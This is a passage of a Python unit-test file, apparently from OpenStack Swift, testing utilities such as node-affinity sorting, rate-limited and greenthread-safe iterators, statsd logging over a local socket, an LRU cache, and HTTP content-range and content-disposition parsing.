""" def __init__(self, upper_bound): self.current = 0 self.concurrent_calls = 0 self.upper_bound = upper_bound self.concurrent_call = False def __iter__(self): return self def next(self): if self.concurrent_calls > 0: self.concurrent_call = True self.concurrent_calls += 1 try: if self.current >= self.upper_bound: raise StopIteration else: val = self.current self.current += 1 eventlet.sleep() # yield control return val finally: self.concurrent_calls -= 1 __next__ = next class TestAffinityKeyFunction(unittest.TestCase): def setUp(self): self.nodes = [dict(id=0, region=1, zone=1), dict(id=1, region=1, zone=2), dict(id=2, region=2, zone=1), dict(id=3, region=2, zone=2), dict(id=4, region=3, zone=1), dict(id=5, region=3, zone=2), dict(id=6, region=4, zone=0), dict(id=7, region=4, zone=1)] def test_single_region(self): keyfn = utils.affinity_key_function("r3=1") ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids) def test_bogus_value(self): self.assertRaises(ValueError, utils.affinity_key_function, "r3") self.assertRaises(ValueError, utils.affinity_key_function, "r3=elephant") def test_empty_value(self): # Empty's okay, it just means no preference keyfn = utils.affinity_key_function("") self.assertTrue(callable(keyfn)) ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids) def test_all_whitespace_value(self): # Empty's okay, it just means no preference keyfn = utils.affinity_key_function(" \n") self.assertTrue(callable(keyfn)) ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids) def test_with_zone_zero(self): keyfn = utils.affinity_key_function("r4z0=1") ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids) def test_multiple(self): keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1") ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids) def test_more_specific_after_less_specific(self): keyfn = utils.affinity_key_function("r2=100, r2z2=50") ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids) class TestAffinityLocalityPredicate(unittest.TestCase): def setUp(self): self.nodes = [dict(id=0, region=1, zone=1), dict(id=1, region=1, zone=2), dict(id=2, region=2, zone=1), dict(id=3, region=2, zone=2), dict(id=4, region=3, zone=1), dict(id=5, region=3, zone=2), dict(id=6, region=4, zone=0), dict(id=7, region=4, zone=1)] def test_empty(self): pred = utils.affinity_locality_predicate('') self.assertTrue(pred is None) def test_region(self): pred = utils.affinity_locality_predicate('r1') self.assertTrue(callable(pred)) ids = [n['id'] for n in self.nodes if pred(n)] self.assertEqual([0, 1], ids) def test_zone(self): pred = utils.affinity_locality_predicate('r1z1') self.assertTrue(callable(pred)) ids = [n['id'] for n in self.nodes if pred(n)] self.assertEqual([0], ids) def test_multiple(self): pred = utils.affinity_locality_predicate('r1, r3, r4z0') self.assertTrue(callable(pred)) ids = [n['id'] for n in self.nodes if pred(n)] self.assertEqual([0, 1, 4, 5, 6], ids) def test_invalid(self): self.assertRaises(ValueError, utils.affinity_locality_predicate, 'falafel') self.assertRaises(ValueError, utils.affinity_locality_predicate, 'r8zQ') self.assertRaises(ValueError, utils.affinity_locality_predicate, 'r2d2') self.assertRaises(ValueError, utils.affinity_locality_predicate, 'r1z1=1') class 
TestRateLimitedIterator(unittest.TestCase): def run_under_pseudo_time( self, func, *args, **kwargs): curr_time = [42.0] def my_time(): curr_time[0] += 0.001 return curr_time[0] def my_sleep(duration): curr_time[0] += 0.001 curr_time[0] += duration with patch('time.time', my_time), \ patch('eventlet.sleep', my_sleep): return func(*args, **kwargs) def test_rate_limiting(self): def testfunc(): limited_iterator = utils.RateLimitedIterator(range(9999), 100) got = [] started_at = time.time() try: while time.time() - started_at < 0.1: got.append(next(limited_iterator)) except StopIteration: pass return got got = self.run_under_pseudo_time(testfunc) # it's 11, not 10, because ratelimiting doesn't apply to the very # first element. self.assertEqual(len(got), 11) def test_rate_limiting_sometimes(self): def testfunc(): limited_iterator = utils.RateLimitedIterator( range(9999), 100, ratelimit_if=lambda item: item % 23 != 0) got = [] started_at = time.time() try: while time.time() - started_at < 0.5: got.append(next(limited_iterator)) except StopIteration: pass return got got = self.run_under_pseudo_time(testfunc) # we'd get 51 without the ratelimit_if, but because 0, 23 and 46 # weren't subject to ratelimiting, we get 54 instead self.assertEqual(len(got), 54) def test_limit_after(self): def testfunc(): limited_iterator = utils.RateLimitedIterator( range(9999), 100, limit_after=5) got = [] started_at = time.time() try: while time.time() - started_at < 0.1: got.append(next(limited_iterator)) except StopIteration: pass return got got = self.run_under_pseudo_time(testfunc) # it's 16, not 15, because ratelimiting doesn't apply to the very # first element. self.assertEqual(len(got), 16) class TestGreenthreadSafeIterator(unittest.TestCase): def increment(self, iterable): plus_ones = [] for n in iterable: plus_ones.append(n + 1) return plus_ones def test_setup_works(self): # it should work without concurrent access self.assertEqual([0, 1, 2, 3], list(UnsafeXrange(4))) iterable = UnsafeXrange(10) pile = eventlet.GreenPile(2) for _ in range(2): pile.spawn(self.increment, iterable) sorted([resp for resp in pile]) self.assertTrue( iterable.concurrent_call, 'test setup is insufficiently crazy') def test_access_is_serialized(self): pile = eventlet.GreenPile(2) unsafe_iterable = UnsafeXrange(10) iterable = utils.GreenthreadSafeIterator(unsafe_iterable) for _ in range(2): pile.spawn(self.increment, iterable) response = sorted(sum([resp for resp in pile], [])) self.assertEqual(list(range(1, 11)), response) self.assertTrue( not unsafe_iterable.concurrent_call, 'concurrent call occurred') class TestStatsdLoggingDelegation(unittest.TestCase): def setUp(self): self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.bind(('localhost', 0)) self.port = self.sock.getsockname()[1] self.queue = Queue() self.reader_thread = threading.Thread(target=self.statsd_reader) self.reader_thread.setDaemon(1) self.reader_thread.start() def tearDown(self): # The "no-op when disabled" test doesn't set up a real logger, so # create one here so we can tell the reader thread to stop. 
if not getattr(self, 'logger', None): self.logger = utils.get_logger({ 'log_statsd_host': 'localhost', 'log_statsd_port': str(self.port), }, 'some-name') self.logger.increment('STOP') self.reader_thread.join(timeout=4) self.sock.close() del self.logger def statsd_reader(self): while True: try: payload = self.sock.recv(4096) if payload and b'STOP' in payload: return 42 self.queue.put(payload) except Exception as e: sys.stderr.write('statsd_reader thread: %r' % (e,)) break def _send_and_get(self, sender_fn, *args, **kwargs): """ Because the client library may not actually send a packet with sample_rate < 1, we keep trying until we get one through. """ got = None while not got: sender_fn(*args, **kwargs) try: got = self.queue.get(timeout=0.5) except Empty: pass return got def assertStat(self, expected, sender_fn, *args, **kwargs): got = self._send_and_get(sender_fn, *args, **kwargs) if six.PY3: got = got.decode('utf-8') return self.assertEqual(expected, got) def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs): got = self._send_and_get(sender_fn, *args, **kwargs) if six.PY3: got = got.decode('utf-8') return self.assertTrue(re.search(expected_regexp, got), [got, expected_regexp]) def test_methods_are_no_ops_when_not_enabled(self): logger = utils.get_logger({ # No "log_statsd_host" means "disabled" 'log_statsd_port': str(self.port), }, 'some-name') # Delegate methods are no-ops self.assertIsNone(logger.update_stats('foo', 88)) self.assertIsNone(logger.update_stats('foo', 88, 0.57)) self.assertIsNone(logger.update_stats('foo', 88, sample_rate=0.61)) self.assertIsNone(logger.increment('foo')) self.assertIsNone(logger.increment('foo', 0.57)) self.assertIsNone(logger.increment('foo', sample_rate=0.61)) self.assertIsNone(logger.decrement('foo')) self.assertIsNone(logger.decrement('foo', 0.57)) self.assertIsNone(logger.decrement('foo', sample_rate=0.61)) self.assertIsNone(logger.timing('foo', 88.048)) self.assertIsNone(logger.timing('foo', 88.57, 0.34)) self.assertIsNone(logger.timing('foo', 88.998, sample_rate=0.82)) self.assertIsNone(logger.timing_since('foo', 8938)) self.assertIsNone(logger.timing_since('foo', 8948, 0.57)) self.assertIsNone(logger.timing_since('foo', 849398, sample_rate=0.61)) # Now, the queue should be empty (no UDP packets sent) self.assertRaises(Empty, self.queue.get_nowait) def test_delegate_methods_with_no_default_sample_rate(self): self.logger = utils.get_logger({ 'log_statsd_host': 'localhost', 'log_statsd_port': str(self.port), }, 'some-name') self.assertStat('some-name.some.counter:1|c', self.logger.increment, 'some.counter') self.assertStat('some-name.some.counter:-1|c', self.logger.decrement, 'some.counter') self.assertStat('some-name.some.operation:4900.0|ms', self.logger.timing, 'some.operation', 4.9 * 1000) self.assertStatMatches(r'some-name\.another\.operation:\d+\.\d+\|ms', self.logger.timing_since, 'another.operation', time.time()) self.assertStat('some-name.another.counter:42|c', self.logger.update_stats, 'another.counter', 42) # Each call can override the sample_rate (also, bonus prefix test) self.logger.set_statsd_prefix('pfx') self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment, 'some.counter', sample_rate=0.972) self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement, 'some.counter', sample_rate=0.972) self.assertStat('pfx.some.operation:4900.0|ms|@0.972', self.logger.timing, 'some.operation', 4.9 * 1000, sample_rate=0.972) self.assertStatMatches(r'pfx\.another\.op:\d+\.\d+\|ms|@0.972', 
self.logger.timing_since, 'another.op', time.time(), sample_rate=0.972) self.assertStat('pfx.another.counter:3|c|@0.972', self.logger.update_stats, 'another.counter', 3, sample_rate=0.972) # Can override sample_rate with non-keyword arg self.logger.set_statsd_prefix('') self.assertStat('some.counter:1|c|@0.939', self.logger.increment, 'some.counter', 0.939) self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement, 'some.counter', 0.939) self.assertStat('some.operation:4900.0|ms|@0.939', self.logger.timing, 'some.operation', 4.9 * 1000, 0.939) self.assertStatMatches(r'another\.op:\d+\.\d+\|ms|@0.939', self.logger.timing_since, 'another.op', time.time(), 0.939) self.assertStat('another.counter:3|c|@0.939', self.logger.update_stats, 'another.counter', 3, 0.939) def test_delegate_methods_with_default_sample_rate(self): self.logger = utils.get_logger({ 'log_statsd_host': 'localhost', 'log_statsd_port': str(self.port), 'log_statsd_default_sample_rate': '0.93', }, 'pfx') self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment, 'some.counter') self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement, 'some.counter') self.assertStat('pfx.some.operation:4760.0|ms|@0.93', self.logger.timing, 'some.operation', 4.76 * 1000) self.assertStatMatches(r'pfx\.another\.op:\d+\.\d+\|ms|@0.93', self.logger.timing_since, 'another.op', time.time()) self.assertStat('pfx.another.counter:3|c|@0.93', self.logger.update_stats, 'another.counter', 3) # Each call can override the sample_rate self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment, 'some.counter', sample_rate=0.9912) self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement, 'some.counter', sample_rate=0.9912) self.assertStat('pfx.some.operation:4900.0|ms|@0.9912', self.logger.timing, 'some.operation', 4.9 * 1000, sample_rate=0.9912) self.assertStatMatches(r'pfx\.another\.op:\d+\.\d+\|ms|@0.9912', self.logger.timing_since, 'another.op', time.time(), sample_rate=0.9912) self.assertStat('pfx.another.counter:3|c|@0.9912', self.logger.update_stats, 'another.counter', 3, sample_rate=0.9912) # Can override sample_rate with non-keyword arg self.logger.set_statsd_prefix('') self.assertStat('some.counter:1|c|@0.987654', self.logger.increment, 'some.counter', 0.987654) self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement, 'some.counter', 0.987654) self.assertStat('some.operation:4900.0|ms|@0.987654', self.logger.timing, 'some.operation', 4.9 * 1000, 0.987654) self.assertStatMatches(r'another\.op:\d+\.\d+\|ms|@0.987654', self.logger.timing_since, 'another.op', time.time(), 0.987654) self.assertStat('another.counter:3|c|@0.987654', self.logger.update_stats, 'another.counter', 3, 0.987654) def test_delegate_methods_with_metric_prefix(self): self.logger = utils.get_logger({ 'log_statsd_host': 'localhost', 'log_statsd_port': str(self.port), 'log_statsd_metric_prefix': 'alpha.beta', }, 'pfx') self.assertStat('alpha.beta.pfx.some.counter:1|c', self.logger.increment, 'some.counter') self.assertStat('alpha.beta.pfx.some.counter:-1|c', self.logger.decrement, 'some.counter') self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms', self.logger.timing, 'some.operation', 4.76 * 1000) self.assertStatMatches( r'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms', self.logger.timing_since, 'another.op', time.time()) self.assertStat('alpha.beta.pfx.another.counter:3|c', self.logger.update_stats, 'another.counter', 3) self.logger.set_statsd_prefix('') self.assertStat('alpha.beta.some.counter:1|c|@0.9912', 
self.logger.increment, 'some.counter', sample_rate=0.9912) self.assertStat('alpha.beta.some.counter:-1|c|@0.9912', self.logger.decrement, 'some.counter', 0.9912) self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912', self.logger.timing, 'some.operation', 4.9 * 1000, sample_rate=0.9912) self.assertStatMatches( r'alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912', self.logger.timing_since, 'another.op', time.time(), sample_rate=0.9912) self.assertStat('alpha.beta.another.counter:3|c|@0.9912', self.logger.update_stats, 'another.counter', 3, sample_rate=0.9912) @reset_logger_state def test_thread_locals(self): logger = utils.get_logger(None) # test the setter logger.thread_locals = ('id', 'ip') self.assertEqual(logger.thread_locals, ('id', 'ip')) # reset logger.thread_locals = (None, None) self.assertEqual(logger.thread_locals, (None, None)) logger.txn_id = '1234' logger.client_ip = '1.2.3.4' self.assertEqual(logger.thread_locals, ('1234', '1.2.3.4')) logger.txn_id = '5678' logger.client_ip = '5.6.7.8' self.assertEqual(logger.thread_locals, ('5678', '5.6.7.8')) def test_no_fdatasync(self): called = [] class NoFdatasync(object): pass def fsync(fd): called.append(fd) with patch('swift.common.utils.os', NoFdatasync()): with patch('swift.common.utils.fsync', fsync): utils.fdatasync(12345) self.assertEqual(called, [12345]) def test_yes_fdatasync(self): called = [] class YesFdatasync(object): def fdatasync(self, fd): called.append(fd) with patch('swift.common.utils.os', YesFdatasync()): utils.fdatasync(12345) self.assertEqual(called, [12345]) def test_fsync_bad_fullsync(self): class FCNTL(object): F_FULLSYNC = 123 def fcntl(self, fd, op): raise IOError(18) with patch('swift.common.utils.fcntl', FCNTL()): self.assertRaises(OSError, lambda: utils.fsync(12345)) def test_fsync_f_fullsync(self): called = [] class FCNTL(object): F_FULLSYNC = 123 def fcntl(self, fd, op): called[:] = [fd, op] return 0 with patch('swift.common.utils.fcntl', FCNTL()): utils.fsync(12345) self.assertEqual(called, [12345, 123]) def test_fsync_no_fullsync(self): called = [] class FCNTL(object): pass def fsync(fd): called.append(fd) with patch('swift.common.utils.fcntl', FCNTL()): with patch('os.fsync', fsync): utils.fsync(12345) self.assertEqual(called, [12345]) class TestAuditLocationGenerator(unittest.TestCase): def test_drive_tree_access(self): orig_listdir = utils.listdir def _mock_utils_listdir(path): if 'bad_part' in path: raise OSError(errno.EACCES) elif 'bad_suffix' in path: raise OSError(errno.EACCES) elif 'bad_hash' in path: raise OSError(errno.EACCES) else: return orig_listdir(path) # Check Raise on Bad partition tmpdir = mkdtemp() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) obj_path = os.path.join(data, "bad_part") with open(obj_path, "w"): pass part1 = os.path.join(data, "partition1") os.makedirs(part1) part2 = os.path.join(data, "partition2") os.makedirs(part2) with patch('swift.common.utils.listdir', _mock_utils_listdir): audit = lambda: list(utils.audit_location_generator( tmpdir, "data", mount_check=False)) self.assertRaises(OSError, audit) rmtree(tmpdir) # Check Raise on Bad Suffix tmpdir = mkdtemp() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) part1 = os.path.join(data, "partition1") os.makedirs(part1) part2 = os.path.join(data, "partition2") os.makedirs(part2) obj_path = os.path.join(part1, "bad_suffix") with open(obj_path, 'w'): pass suffix = os.path.join(part2, "suffix") os.makedirs(suffix) with patch('swift.common.utils.listdir', _mock_utils_listdir): audit = lambda: 
list(utils.audit_location_generator( tmpdir, "data", mount_check=False)) self.assertRaises(OSError, audit) rmtree(tmpdir) # Check Raise on Bad Hash tmpdir = mkdtemp() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) part1 = os.path.join(data, "partition1") os.makedirs(part1) suffix = os.path.join(part1, "suffix") os.makedirs(suffix) hash1 = os.path.join(suffix, "hash1") os.makedirs(hash1) obj_path = os.path.join(suffix, "bad_hash") with open(obj_path, 'w'): pass with patch('swift.common.utils.listdir', _mock_utils_listdir): audit = lambda: list(utils.audit_location_generator( tmpdir, "data", mount_check=False)) self.assertRaises(OSError, audit) rmtree(tmpdir) def test_non_dir_drive(self): with temptree([]) as tmpdir: logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) # Create a file, that represents a non-dir drive open(os.path.join(tmpdir, 'asdf'), 'w') locations = utils.audit_location_generator( tmpdir, "data", mount_check=False, logger=logger ) self.assertEqual(list(locations), []) self.assertEqual(1, len(logger.get_lines_for_level('warning'))) # Test without the logger locations = utils.audit_location_generator( tmpdir, "data", mount_check=False ) self.assertEqual(list(locations), []) def test_mount_check_drive(self): with temptree([]) as tmpdir: logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) # Create a file, that represents a non-dir drive open(os.path.join(tmpdir, 'asdf'), 'w') locations = utils.audit_location_generator( tmpdir, "data", mount_check=True, logger=logger ) self.assertEqual(list(locations), []) self.assertEqual(2, len(logger.get_lines_for_level('warning'))) # Test without the logger locations = utils.audit_location_generator( tmpdir, "data", mount_check=True ) self.assertEqual(list(locations), []) def test_non_dir_contents(self): with temptree([]) as tmpdir: logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) with open(os.path.join(data, "partition1"), "w"): pass partition = os.path.join(data, "partition2") os.makedirs(partition) with open(os.path.join(partition, "suffix1"), "w"): pass suffix = os.path.join(partition, "suffix2") os.makedirs(suffix) with open(os.path.join(suffix, "hash1"), "w"): pass locations = utils.audit_location_generator( tmpdir, "data", mount_check=False, logger=logger ) self.assertEqual(list(locations), []) def test_find_objects(self): with temptree([]) as tmpdir: expected_objs = list() logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) # Create a file, that represents a non-dir drive open(os.path.join(tmpdir, 'asdf'), 'w') partition = os.path.join(data, "partition1") os.makedirs(partition) suffix = os.path.join(partition, "suffix") os.makedirs(suffix) hash_path = os.path.join(suffix, "hash") os.makedirs(hash_path) obj_path = os.path.join(hash_path, "obj1.db") with open(obj_path, "w"): pass expected_objs.append((obj_path, 'drive', 'partition1')) partition = os.path.join(data, "partition2") os.makedirs(partition) suffix = os.path.join(partition, "suffix2") os.makedirs(suffix) hash_path = os.path.join(suffix, "hash2") os.makedirs(hash_path) obj_path = os.path.join(hash_path, "obj2.db") with open(obj_path, "w"): pass expected_objs.append((obj_path, 'drive', 'partition2')) locations = utils.audit_location_generator( tmpdir, "data", mount_check=False, logger=logger ) got_objs = list(locations) self.assertEqual(len(got_objs), len(expected_objs)) self.assertEqual(sorted(got_objs), sorted(expected_objs)) 
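            # The stray 'asdf' file created at the drive level is not a
            # directory, so audit_location_generator should have logged
            # exactly one warning for it.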
self.assertEqual(1, len(logger.get_lines_for_level('warning'))) def test_ignore_metadata(self): with temptree([]) as tmpdir: logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) partition = os.path.join(data, "partition2") os.makedirs(partition) suffix = os.path.join(partition, "suffix2") os.makedirs(suffix) hash_path = os.path.join(suffix, "hash2") os.makedirs(hash_path) obj_path = os.path.join(hash_path, "obj1.dat") with open(obj_path, "w"): pass meta_path = os.path.join(hash_path, "obj1.meta") with open(meta_path, "w"): pass locations = utils.audit_location_generator( tmpdir, "data", ".dat", mount_check=False, logger=logger ) self.assertEqual(list(locations), [(obj_path, "drive", "partition2")]) class TestGreenAsyncPile(unittest.TestCase): def setUp(self): self.timeout = Timeout(5.0) def tearDown(self): self.timeout.cancel() def test_runs_everything(self): def run_test(): tests_ran[0] += 1 return tests_ran[0] tests_ran = [0] pile = utils.GreenAsyncPile(3) for x in range(3): pile.spawn(run_test) self.assertEqual(sorted(x for x in pile), [1, 2, 3]) def test_is_asynchronous(self): def run_test(index): events[index].wait() return index pile = utils.GreenAsyncPile(3) for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)): events = [eventlet.event.Event(), eventlet.event.Event(), eventlet.event.Event()] for x in range(3): pile.spawn(run_test, x) for x in order: events[x].send() self.assertEqual(next(pile), x) def test_next_when_empty(self): def run_test(): pass pile = utils.GreenAsyncPile(3) pile.spawn(run_test) self.assertIsNone(next(pile)) self.assertRaises(StopIteration, lambda: next(pile)) def test_waitall_timeout_timesout(self): def run_test(sleep_duration): eventlet.sleep(sleep_duration) completed[0] += 1 return sleep_duration completed = [0] pile = utils.GreenAsyncPile(3) pile.spawn(run_test, 0.1) pile.spawn(run_test, 1.0) self.assertEqual(pile.waitall(0.5), [0.1]) self.assertEqual(completed[0], 1) def test_waitall_timeout_completes(self): def run_test(sleep_duration): eventlet.sleep(sleep_duration) completed[0] += 1 return sleep_duration completed = [0] pile = utils.GreenAsyncPile(3) pile.spawn(run_test, 0.1) pile.spawn(run_test, 0.1) self.assertEqual(pile.waitall(0.5), [0.1, 0.1]) self.assertEqual(completed[0], 2) def test_waitfirst_only_returns_first(self): def run_test(name): eventlet.sleep(0) completed.append(name) return name completed = [] pile = utils.GreenAsyncPile(3) pile.spawn(run_test, 'first') pile.spawn(run_test, 'second') pile.spawn(run_test, 'third') self.assertEqual(pile.waitfirst(0.5), completed[0]) # 3 still completed, but only the first was returned. 
self.assertEqual(3, len(completed)) def test_wait_with_firstn(self): def run_test(name): eventlet.sleep(0) completed.append(name) return name for first_n in [None] + list(range(6)): completed = [] pile = utils.GreenAsyncPile(10) for i in range(10): pile.spawn(run_test, i) actual = pile._wait(1, first_n) expected_n = first_n if first_n else 10 self.assertEqual(completed[:expected_n], actual) self.assertEqual(10, len(completed)) def test_pending(self): pile = utils.GreenAsyncPile(3) self.assertEqual(0, pile._pending) for repeats in range(2): # repeat to verify that pending will go again up after going down for i in range(4): pile.spawn(lambda: i) self.assertEqual(4, pile._pending) for i in range(3, -1, -1): next(pile) self.assertEqual(i, pile._pending) # sanity check - the pile is empty self.assertRaises(StopIteration, pile.next) # pending remains 0 self.assertEqual(0, pile._pending) def _exploder(self, arg): if isinstance(arg, Exception): raise arg else: return arg def test_blocking_last_next_explodes(self): pile = utils.GreenAsyncPile(2) pile.spawn(self._exploder, 1) pile.spawn(self._exploder, 2) pile.spawn(self._exploder, Exception('kaboom')) self.assertEqual(1, next(pile)) self.assertEqual(2, next(pile)) with self.assertRaises(StopIteration): next(pile) self.assertEqual(pile.inflight, 0) self.assertEqual(pile._pending, 0) def test_no_blocking_last_next_explodes(self): pile = utils.GreenAsyncPile(10) pile.spawn(self._exploder, 1) self.assertEqual(1, next(pile)) pile.spawn(self._exploder, 2) self.assertEqual(2, next(pile)) pile.spawn(self._exploder, Exception('kaboom')) with self.assertRaises(StopIteration): next(pile) self.assertEqual(pile.inflight, 0) self.assertEqual(pile._pending, 0) def test_exceptions_in_streaming_pile(self): with utils.StreamingPile(2) as pile: results = list(pile.asyncstarmap(self._exploder, [ (1,), (Exception('kaboom'),), (3,), ])) self.assertEqual(results, [1, 3]) self.assertEqual(pile.inflight, 0) self.assertEqual(pile._pending, 0) def test_exceptions_at_end_of_streaming_pile(self): with utils.StreamingPile(2) as pile: results = list(pile.asyncstarmap(self._exploder, [ (1,), (2,), (Exception('kaboom'),), ])) self.assertEqual(results, [1, 2]) self.assertEqual(pile.inflight, 0) self.assertEqual(pile._pending, 0) class TestLRUCache(unittest.TestCase): def test_maxsize(self): @utils.LRUCache(maxsize=10) def f(*args): return math.sqrt(*args) _orig_math_sqrt = math.sqrt # setup cache [0-10) for i in range(10): self.assertEqual(math.sqrt(i), f(i)) self.assertEqual(f.size(), 10) # validate cache [0-10) with patch('math.sqrt'): for i in range(10): self.assertEqual(_orig_math_sqrt(i), f(i)) self.assertEqual(f.size(), 10) # update cache [10-20) for i in range(10, 20): self.assertEqual(math.sqrt(i), f(i)) # cache size is fixed self.assertEqual(f.size(), 10) # validate cache [10-20) with patch('math.sqrt'): for i in range(10, 20): self.assertEqual(_orig_math_sqrt(i), f(i)) # validate un-cached [0-10) with patch('math.sqrt', new=None): for i in range(10): self.assertRaises(TypeError, f, i) # cache unchanged self.assertEqual(f.size(), 10) with patch('math.sqrt'): for i in range(10, 20): self.assertEqual(_orig_math_sqrt(i), f(i)) self.assertEqual(f.size(), 10) def test_maxtime(self): @utils.LRUCache(maxtime=30) def f(*args): return math.sqrt(*args) self.assertEqual(30, f.maxtime) _orig_math_sqrt = math.sqrt now = time.time() the_future = now + 31 # setup cache [0-10) with patch('time.time', lambda: now): for i in range(10): self.assertEqual(math.sqrt(i), f(i)) 
self.assertEqual(f.size(), 10) # validate cache [0-10) with patch('math.sqrt'): for i in range(10): self.assertEqual(_orig_math_sqrt(i), f(i)) self.assertEqual(f.size(), 10) # validate expired [0-10) with patch('math.sqrt', new=None): with patch('time.time', lambda: the_future): for i in range(10): self.assertRaises(TypeError, f, i) # validate repopulates [0-10) with patch('time.time', lambda: the_future): for i in range(10): self.assertEqual(math.sqrt(i), f(i)) # reuses cache space self.assertEqual(f.size(), 10) def test_set_maxtime(self): @utils.LRUCache(maxtime=30) def f(*args): return math.sqrt(*args) self.assertEqual(30, f.maxtime) self.assertEqual(2, f(4)) self.assertEqual(1, f.size()) # expire everything f.maxtime = -1 # validate un-cached [0-10) with patch('math.sqrt', new=None): self.assertRaises(TypeError, f, 4) def test_set_maxsize(self): @utils.LRUCache(maxsize=10) def f(*args): return math.sqrt(*args) for i in range(12): f(i) self.assertEqual(f.size(), 10) f.maxsize = 4 for i in range(12): f(i) self.assertEqual(f.size(), 4) class TestSpliterator(unittest.TestCase): def test_string(self): input_chunks = ["coun", "ter-", "b", "ra", "nch-mater", "nit", "y-fungusy", "-nummular"] si = utils.Spliterator(input_chunks) self.assertEqual(''.join(si.take(8)), "counter-") self.assertEqual(''.join(si.take(7)), "branch-") self.assertEqual(''.join(si.take(10)), "maternity-") self.assertEqual(''.join(si.take(8)), "fungusy-") self.assertEqual(''.join(si.take(8)), "nummular") def test_big_input_string(self): input_chunks = ["iridium"] si = utils.Spliterator(input_chunks) self.assertEqual(''.join(si.take(2)), "ir") self.assertEqual(''.join(si.take(1)), "i") self.assertEqual(''.join(si.take(2)), "di") self.assertEqual(''.join(si.take(1)), "u") self.assertEqual(''.join(si.take(1)), "m") def test_chunk_boundaries(self): input_chunks = ["soylent", "green", "is", "people"] si = utils.Spliterator(input_chunks) self.assertEqual(''.join(si.take(7)), "soylent") self.assertEqual(''.join(si.take(5)), "green") self.assertEqual(''.join(si.take(2)), "is") self.assertEqual(''.join(si.take(6)), "people") def test_no_empty_strings(self): input_chunks = ["soylent", "green", "is", "people"] si = utils.Spliterator(input_chunks) outputs = (list(si.take(7)) # starts and ends on chunk boundary + list(si.take(2)) # spans two chunks + list(si.take(3)) # begins but does not end chunk + list(si.take(2)) # ends but does not begin chunk + list(si.take(6))) # whole chunk + EOF self.assertNotIn('', outputs) def test_running_out(self): input_chunks = ["not much"] si = utils.Spliterator(input_chunks) self.assertEqual(''.join(si.take(4)), "not ") self.assertEqual(''.join(si.take(99)), "much") # short self.assertEqual(''.join(si.take(4)), "") self.assertEqual(''.join(si.take(4)), "") def test_overlap(self): input_chunks = ["one fish", "two fish", "red fish", "blue fish"] si = utils.Spliterator(input_chunks) t1 = si.take(20) # longer than first chunk self.assertLess(len(next(t1)), 20) # it's not exhausted t2 = si.take(20) self.assertRaises(ValueError, next, t2) def test_closing(self): input_chunks = ["abcd", "efg", "hij"] si = utils.Spliterator(input_chunks) it = si.take(3) # shorter than first chunk self.assertEqual(next(it), 'abc') it.close() self.assertEqual(list(si.take(20)), ['d', 'efg', 'hij']) si = utils.Spliterator(input_chunks) self.assertEqual(list(si.take(1)), ['a']) it = si.take(1) # still shorter than first chunk self.assertEqual(next(it), 'b') it.close() self.assertEqual(list(si.take(20)), ['cd', 'efg', 'hij']) si = 
utils.Spliterator(input_chunks) it = si.take(6) # longer than first chunk, shorter than first + second self.assertEqual(next(it), 'abcd') self.assertEqual(next(it), 'ef') it.close() self.assertEqual(list(si.take(20)), ['g', 'hij']) si = utils.Spliterator(input_chunks) self.assertEqual(list(si.take(2)), ['ab']) it = si.take(3) # longer than rest of chunk self.assertEqual(next(it), 'cd') it.close() self.assertEqual(list(si.take(20)), ['efg', 'hij']) class TestParseContentRange(unittest.TestCase): def test_good(self): start, end, total = utils.parse_content_range("bytes 100-200/300") self.assertEqual(start, 100) self.assertEqual(end, 200) self.assertEqual(total, 300) def test_bad(self): self.assertRaises(ValueError, utils.parse_content_range, "100-300/500") self.assertRaises(ValueError, utils.parse_content_range, "bytes 100-200/aardvark") self.assertRaises(ValueError, utils.parse_content_range, "bytes bulbous-bouffant/4994801") class TestParseContentDisposition(unittest.TestCase): def test_basic_content_type(self): name, attrs = utils.parse_content_disposition('text/plain') self.assertEqual(name, 'text/plain') self.assertEqual(attrs, {}) def test_content_type_with_charset(self): name, attrs = utils.parse_content_disposition( 'text/plain; charset=UTF8') self.assertEqual(name, 'text/plain') self.assertEqual(attrs, {'charset': 'UTF8'}) def test_content_disposition(self): name, attrs = utils.parse_content_disposition( 'form-data; name="somefile"; filename="test.html"') self.assertEqual(name, 'form-data') self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'}) def test_content_disposition_without_white_space(self): name, attrs = utils.parse_content_disposition( 'form-data;name="somefile";filename="test.html"') self.assertEqual(name, 'form-data') self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'}) 